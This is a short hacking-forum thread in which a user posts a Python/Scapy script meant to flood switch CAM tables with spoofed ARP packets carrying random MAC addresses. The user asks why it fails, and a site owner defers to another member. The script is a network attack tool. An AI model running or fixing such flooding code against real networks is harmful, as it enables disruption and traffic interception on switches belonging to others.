python/scapy

Questions about programming languages and debugging
Post Reply
User avatar
bsod
Newbie
Newbie
Posts: 2
Joined: 24 Sep 2009, 16:00
14

python/scapy

Post by bsod »

hi, im trying to make asmall mac flood tool in python to fill switches cam tables but i cant make the magic happen? can you see what im doing wrong?

Code: Select all

from scapy.all import * 
while 1:
  dest_mac = RandMAC()
  src_mac = RandMAC()
  sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

um, wait a little until Maboroshi read it, he's a Python/Scapy expert (he even did the Scapy port to Windows)... :wink:

User avatar
bsod
Newbie
Newbie
Posts: 2
Joined: 24 Sep 2009, 16:00
14

Post by bsod »

well the code seems to run fine it just dont do its job. to test it i used wireshark to look at the packets then ran THC's parasite "which works" and the packets are almost the same so im not sure wtf is going on.

Post Reply